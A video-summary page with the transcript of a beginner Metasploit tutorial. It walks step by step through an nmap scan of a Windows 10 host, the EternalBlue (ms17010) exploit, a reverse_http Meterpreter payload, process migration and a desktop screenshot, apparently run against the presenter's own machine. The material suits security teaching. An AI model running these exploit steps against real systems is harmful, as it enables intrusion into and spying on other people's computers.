Metasploit For Beginners - How To Scan And Pwn A Computer | Learn From A Pro Hacker
Summary
TLDRThis episode of 'Hub Hack' demonstrates how to identify vulnerabilities in computer systems for unauthorized access. The tutorial covers using nmap to scan for open services, Metasploit for finding exploits, and exploiting SMB vulnerabilities like 'Eternal Blue' to gain control of a Windows system. It concludes with a warning about the importance of securing services to prevent such breaches, encouraging viewers to stay vigilant about cybersecurity.
Takeaways
- 😀 The video is an educational tutorial on hacking techniques to find vulnerabilities in computer systems.
- 🔍 It teaches how to use nmap to scan a computer system for running services and look for vulnerabilities.
- 💻 The presenter demonstrates the process on a Windows 10 computer by checking the IP address with 'ipconfig'.
- 🚀 The tutorial covers how to use nmap to identify open ports and services, such as SMB, which can be exploited.
- 🔑 It explains the importance of identifying the version of services to find specific exploits.
- 🕵️♂️ Metasploit is introduced as the exploitation framework used to check for vulnerabilities and launch attacks.
- 🔎 The video shows how to search for SMB-related modules in Metasploit to find potential exploits.
- 🔄 The use of 'auxiliary scanner' in Metasploit is demonstrated to check if the system is vulnerable to SMB attacks.
- 💡 The script references the infamous 'Eternal Blue' exploit, associated with the WannaCry ransomware attack.
- 🤖 The tutorial guides through setting up an exploit in Metasploit, including setting the target IP and payload.
- 🖼️ After gaining access, the video shows how to migrate the shell to a different process to capture the screen of the compromised system.
- 🛡️ The presenter emphasizes the importance of being cautious with the services running on one's computer system for security.
Q & A
What is the main topic of the video script?
-The main topic of the video script is about finding vulnerabilities in computer systems to gain unauthorized access and control over the entire system.
What tool is used to scan a computer system for services and vulnerabilities?
-The tool used to scan a computer system for services and vulnerabilities is Nmap.
What is the purpose of the 'nmap -sV' command?
-The 'nmap -sV' command is used to determine the version of the services running on the open ports of a scanned host.
What is SMB and why is it significant in the context of the video?
-SMB stands for Server Message Block, a protocol that allows file and printer sharing across computers. It is significant because the script discusses exploiting vulnerabilities in SMB services to gain access to a computer system.
What is Metasploit and how does it relate to the video script?
-Metasploit is an exploitation framework used to identify, exploit, and validate vulnerabilities. In the video script, it is used to check if the computer system is vulnerable to certain types of attacks.
What is the 'ms17010' vulnerability mentioned in the script?
-The 'ms17010' vulnerability, also known as 'EternalBlue', is a critical SMB vulnerability that was exploited in widespread ransomware attacks. It allows remote code execution on affected systems.
What does the script suggest doing after finding the version of services with Nmap?
-After finding the version of services with Nmap, the script suggests using Metasploit to check if the computer system is vulnerable to attacks specific to those service versions.
What payload is used in the script to exploit the 'ms17010' vulnerability?
-The script uses 'windows/meterpreter/reverse_http' as the payload to exploit the 'ms17010' vulnerability.
What action is taken after a successful exploitation to gain control of the computer system?
-After a successful exploitation, the script demonstrates migrating the shell to a different process and taking a screen capture of the entire computer system to show that full control has been achieved.
What is the final message of the video script regarding computer security?
-The final message of the video script is a warning to be careful about the services running on computer systems, emphasizing the importance of cybersecurity.
Outlines
💻 Introduction to Hacking Techniques
This paragraph introduces a tutorial on hacking, specifically how to find vulnerabilities in computer systems to gain unauthorized access. The host demonstrates the use of nmap to scan for open services on a target computer and discusses the importance of identifying weaknesses in these services. The tutorial aims to teach viewers how to find exploits and utilize them to access a computer system, starting with a practical example of scanning a Windows 10 computer for open ports and services.
🔍 Scanning and Exploiting SMB Vulnerabilities
The second paragraph delves into the process of scanning for and exploiting SMB (Server Message Block) vulnerabilities, which are commonly found in Windows systems and can be used for file and printer sharing. The host explains how to use nmap to identify the version of SMB services running on a target machine and then introduces Metasploit, an exploitation framework, to search for and utilize SMB-related exploits. The paragraph covers the use of specific Metasploit modules to check for vulnerabilities, such as the infamous 'Eternal Blue' exploit, and demonstrates how to execute an attack to gain control over the target system. The host also shows how to migrate the shell to a different process for further actions, such as taking a screenshot of the target's desktop, emphasizing the seriousness of leaving services vulnerable to such attacks.
Mindmap
Keywords
💡Hacking
💡Vulnerabilities
💡Nmap
💡Services
💡SMB (Server Message Block)
💡Exploits
💡Metasploit
💡Payload
💡MS17010
💡Eternal Blue
💡Meterpreter
Highlights
Introduction to finding system vulnerabilities for unauthorized access.
Teaching how to scan a computer system for running services and vulnerabilities.
Using nmap to scan a computer for available services and potential exploits.
Demonstration of nmap scanning on a Windows 10 computer.
Explanation of how to bypass firewalls during nmap scanning.
Identification of open ports and services such as SMB.
SMB (Server Message Block) explained for file and printer sharing.
Finding the version of services to identify specific vulnerabilities.
Launching Metasploit for further exploitation of the system.
Searching for SMB-related modules in Metasploit.
Utilizing auxiliary scanners to check for SMB vulnerabilities.
The significance of the SMB MS17010 vulnerability in past ransomware attacks.
How to use Metasploit to check for specific SMB vulnerabilities.
Selecting and configuring an exploit for the SMB MS17010 vulnerability.
Executing the exploit to gain access to the target computer system.
Demonstration of migrating the shell to a different process for further actions.
Capturing and saving a screenshot of the target's desktop.
Emphasizing the importance of securing services running on computer systems.
Conclusion and call to action for feedback, likes, shares, and subscriptions.
Transcripts
hi and welcome back to another episode
on hub hack and today i'll be teaching
you
about how you can find holes in a
computer system that can give you
access and take over the entire computer
completely
don't believe me let's go
[Music]
so in a session today what we'll be
learning is how we can scan a computer
system
for different kind of services they're
running and are looking for
vulnerabilities in those systems
so looking for weaknesses in those
services they can then give us access
to find exploits that are available
making sure that this computer system is
susceptible to those attacks
which we can then utilize those exploits
to give us access
into the computer system i will teach
you about how you can do it quickly
so right in front of us i have call
linux running and i can go ahead and
enter terminal
all right so i can zoom a little more so
it's easier for you to see so the first
thing we can do is to go ahead and use
nmap to scan a specific computer
so that we can find those services
available and then looking
for exploits that are in affiliation
with those
vulnerabilities so that we can exploit
it and give us access
into the entire computer system so the
first thing you can do
over here i have a windows 10 computer
running and i can go ahead and enter
ipconfig
and right here as i scroll up further i
can see the ipv4 address
so in this case our target ip address is
192
168.0.186 so all i got to do right now
is go under nmap
and enter 192 168.0.186
hit enter on this and we'll begin the
scanning using nmap so map is a network
mapping service
that can help us investigate and probe a
computer
to check for services check for versions
check for different types
of accessors that we can perhaps even
try to gain access into
all right and the first thing you notice
here is that the host
seems down if it is really up but
blocking european purpose try
dash pn alright so what is happening
here is that
there is a windows firewall that is
running right which is the result
of us being unable to complete a default
scan so all you're going to do now is
enter
dash capital pn hit enter on this and
we'll now begin
right the scanning and the address will
be marked as up
and of course the scan time will take a
little longer and in this case we can
identify the following all right we have
one three five as a port number we have
one
tree nine as net buyers ssn four four
five two eight six nine as well as three
three eight nine all right so we can see
all these different kind of services
that are open up
so what we can do next is to do an
investigation
about all the specific ports and what i
can tell you for sure
is that because you are so familiar with
the different types
of services because of your background
and network administration and system
administration
you know all right without even further
checking that
1 39 and 445 are actually services
associated with smb right so what is smp
smb is server message block so it allows
file sharing literally
file printer sharing that's being
enabled on computers and a lot of
computers actually have
all right smb running in windows
computer particularly
as a result that there are protection
weaknesses that you can try to exploit
to gain access to it
so what i can do next is to find out the
version of those particular services
so you can enter dash s followed by a
capital v hit enter on this
and it will try to help us find out
specific versions in association
with those services that are open in a
host all right so right here we can try
to figure out what is going on in this
particular computer all right so we have
the following
more detailed version of it and we have
the host name now all right and we have
the windows
we have the workgroup information and so
on so
this gives us a more precise feedback
about the kind of services that are
actually open up
so what i can do next is to go ahead and
start a metasploit which is our
exploitation framework
that would give us access into the
entire computer system all right so i'll
go ahead and enter sudo
msf console hit enter on this and i can
enter my password
and once i load up my exploit framework
we can then check the computer system to
see if it's vulnerable to certain type
of attacks
all right so what i can do now is to go
ahead and enter search and then i can
enter smb all right so this is
exactly what we're looking out for so in
this case we have a lot
of different kind of modules that we can
run to check the computer system
all right so we can scroll all the way
up and look at all this
different methods that we can utilize as
part of the hack
and we can see over here we have
exploits we have auxiliary scanner and
so on
so what i can so what i can do next is
to teach you about how you can actually
search more precisely
in metasploit so what we can do now is
enter grab for by scanner
follow by search smb hit enter on this
and we just show us
all those results that only contain
scanner and in this case we can see
auxiliary
scanner and what we're doing now is to
check whether this particular system
is vulnerable to smb attacks all right
so here we have smb
ms-17010 do you remember back in the
days
when there was a huge outbreak of
ransomware attacks so they were
utilizing this specific
all right scanning method as well as
exploitation to gain access
into the entire computer system all
right so right here what i can do next
is go ahead
all right and enter use auxiliary
scanner smb smb underscore ms17010 hit
enter on this
and enter show options alright so this
will show us all the options that we
have to key in
as part of checking whether this
specific computer can be vulnerable to
this attack so all i got to do now
is under set our hosts and the ip
address that we're targeting
192.168.0.1.6. so you may have your own
ip address
as part of the attack so once you're
done right here all you got to do is to
go and hit enter run
hit enter on this and state the
following scary stuff
host is likely vulnerable to ms-17010
so i'm going to pause here for a moment
and what we are trying to do right now
so far
is to scan the device for services
they're running and also to look out for
potential vulnerabilities
that is associated with those services
in the computer okay
and next is to find the export available
so that we can gain direct access
back to the computer giving us full
control of the entire computer system
okay
so what i can do next is to go ahead all
right and search
for smb okay so we have smb and we can
look out for all those
modules available with smb and of course
what we can do even better
is to go ahead and enter graph and now
what we are trying to do
is to look for exploits so i grab export
search smb hit enter on this
and we have a number of exploits
available for us to use and utilize
as part of running the attack all right
so all i can see here
screw up all the way back to the top
right so we have multi http
windows smb and so on and what we are
trying to find here
is an exploit that can help us launch an
attack directly against
this service exploit windows smb ms17010
eternal blue alright or you can also use
exploit windows
smb ms17010ps exec so i'll go ahead and
select this
all right enter use followed by exploit
paste selection hit enter on this
okay and we can enter show options
and right here we have the number of
options that we need to key in so the
main option
is our host so go ahead and enter the ip
address so this is the target
machine that we're going after so enter
set our host 182.168.0.1.6 hit enter on
this
so we have set the our host right now
and all we got to do right now is to go
ahead
and set a particular payload all right
so we can enter set
payload you can double tap on this and
it will show you all the available
payloads that you can utilize
as part of running the attack okay so in
this case what i can do is enter set
payload
and we can use say for example windows
slash and double tap on it and look at
all the other possibilities that we can
utilize okay
so in this case we have multiplier all
right so let's try to use interpreter
for this case
right so we can use windows multiplier
double tap on it and see what else we
got and we can now use for example
reverse
underscore http hit enter on this under
show options
and now we're going to set the l host
and l host has already been set for us
so that's great
fantastic a lot of automation on it so
all i got to do now is enter exploit
and let's see what happens hit exploit
on this and we can see
right here right now we have the
material session one open
which means we are literally in we have
hacked
into the computer system and we are now
full control
of the entire computer i can enter
system fold hit enter on this and we can
see the system information
inside the computer right now i can
enter help and this will show us
all the commands and instructions that
we can send directly into the windows
computer so what's next is i can migrate
this shell that we've got in this
multiple shell that we've gotten
into a different process in which will
then allow us to take a screen capture
of the entire computer system
so all i'm gonna do now is enter for
example okay ps
to see all the lists of services inside
the computer system
all right and this will show us all the
processes they're running and i can do
enter migrate and we can migrate to say
four zero two zero which is on
onedrive.exe
okay so i go ahead and hit enter on this
because it is currently running
as a user which is loy leongyan so again
i'm hacking myself so don't worry i will
not be hacking you
go ahead and hit enter on this and now
we're migrating the process over
and right here okay once we've completed
the migration i can enter
all right the following i can enter
screen all right followed by
shot hit enter on this and we will save
a copy
of the entire desktop screen to the
following all right so i can go ahead
and open up this file right so i click
on the top left corner
i open the folder all right and right
here i can see the file has been saved
and i can double click on it on the
following all right we got this
particular file that's been saved
double clicked on it and right here we
can see we're in
we have full control of the entire
computer system isn't that scary
so you got to be really careful about
what kind of services you have running
inside all your computer systems
so once again i hope you learned
something valuable in today's tutorial
if you have any questions please leave a
comment below
and i'll try my best to answer any of
your questions remember like share and
subscribe to channel
so that you can become a brand of the
latest cybersecurity tutorial thank you
so much once again for watching
浏览更多相关视频
Simple Penetration Testing Tutorial for Beginners!
Windows Latest CMD Hacks & Tricks
Threat to Infomation system- passive & active attack, accidental & intentional threats | MCA b.tech
Penetration Tests - CompTIA Security+ SY0-701 - 5.5
Arithmetic Overflow and Underflow | Hack Solidity (0.6)
SSRF to Pwned on AWS
5.0 / 5 (0 votes)